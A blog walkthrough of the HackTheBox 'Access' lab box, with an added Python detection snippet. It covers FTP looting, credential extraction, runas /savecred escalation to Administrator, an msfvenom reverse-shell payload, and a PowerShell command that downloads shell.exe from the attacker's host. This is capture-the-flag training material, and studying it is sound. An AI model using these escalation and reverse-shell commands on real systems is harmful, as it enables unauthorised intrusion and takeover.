Here’s how to pop the box titled ‘Access’ on HackTheBox! Watch the video below or continue reading.
To start, let’s do an nmap scan:
nmap -sV -sC 10.10.10.98
We can see that there’s a web server, telnet, and FTP open. Let’s try for anonymous FTP access.
Sure enough, it’s allowed. There are two directories…
In each directory, there’s a file. Let’s pull each of them.
If we run the ‘file’ command on the backup.mdb file, we can see it’s a Microsoft Access Database.
If I pop it open in Microsoft Access, there’s a particular table of interest. We’ve got creds!
The other file we pulled is a ZIP, and can be extracted with the above password.
In the ZIP is a .PST file that we can extract using readpst:
readpst -o pstexport/ -D -j4 -r -tea -u -w -m Access\ Control.pst
Sure enough, when we cat the contents of the message, we see another credential among the headers and markup:
Next, we telnet in to the box with those creds:
Grabbing the user flag:
Next, let’s do some recon to find active users and any stored credentials.
powershell -Command (get-wmiobject win32_useraccount)
The above output is very interesting: we can see that there are stored credentials… maybe the “security” user ran something as Administrator and the password is cached?
runas /user:Administrator /noprofile /savecred "cmd.exe /c whoami > C:\users\security\me.txt"
Running the “runas” command with /savecred works to elevate to Administrator! Above, I plopped out the contents of a ‘whoami’ command to prove it. At this point, we can get the root flag!
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"
But why stop there? Let’s get a Meterpreter shell as SYSTEM to take it a step further.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe
Then we pull down the .exe with the Meterpreter payload embedded onto the system:
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8000/shell.exe', 'shell.exe')
Then let’s get ready on my Kali system to catch the reverse shell before we run it.
The rest is a piece of cake. I run the shell.exe file as Administrator on the box, using the saved credential technique mentioned above, and the shell connects to me.
That’s it! This box was interesting because it wasn’t as exploit-based as it was permissions-based. Like most HackTheBox systems, the name is fitting!
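For defenders, the saved-credential elevation above leaves two things to look for: the stored entry itself and runas invocations that pass /savecred. The following Python is an added example, not part of the original post; it assumes stored credentials are collected with Windows' cmdkey /list (a command the post does not show), and the sample output and command lines are constructed.

```python
import re

# Constructed sample of `cmdkey /list` output (not captured from the box).
SAMPLE_CMDKEY = """\
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: builduser
"""

# Constructed process-creation command lines (e.g. Event ID 4688 or Sysmon Event ID 1).
SAMPLE_CMDLINES = [
    'runas /user:Administrator /noprofile /savecred "cmd.exe /c whoami"',
    'runas /user:ACCESS\\svc_backup "notepad.exe"',
    'C:\\Windows\\System32\\RunAs.exe /SAVECRED /user:Administrator cmd.exe',
]

def parse_cmdkey(text):
    """Return one dict per stored credential in `cmdkey /list` output."""
    entries, current = [], None
    for m in re.finditer(r"(?m)^[ \t]*(Target|Type|User):[ \t]*(.*\S)", text):
        key, value = m.group(1).lower(), m.group(2)
        if key == "target":            # every entry starts with a Target line
            current = {"target": value}
            entries.append(current)
        elif current is not None:
            current[key] = value
    return entries

def interactive_saved_creds(entries):
    """Entries with a Domain:interactive= target, the kind runas /savecred reuses."""
    return [e for e in entries if e["target"].lower().startswith("domain:interactive=")]

def savecred_runas(cmdlines):
    """Return (user, command line) for each runas invocation that passes /savecred."""
    hits = []
    for cl in cmdlines:
        if not (re.search(r"(?i)\brunas(\.exe)?\b", cl) and re.search(r"(?i)/savecred\b", cl)):
            continue
        user = re.search(r'(?i)/user:("[^"]+"|\S+)', cl)
        hits.append((user.group(1).strip('"') if user else None, cl))
    return hits
```

A flagged entry can be removed on the host with cmdkey /delete:<target>, after which runas /savecred prompts for the password again.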
Scott Rainville is a recent graduate of Champlain College currently working as a Cybersecurity Analyst/Engineer/purple-teamer. He loves nearly anything to do with computer networking and cybersecurity, from malware analysis to penetration testing.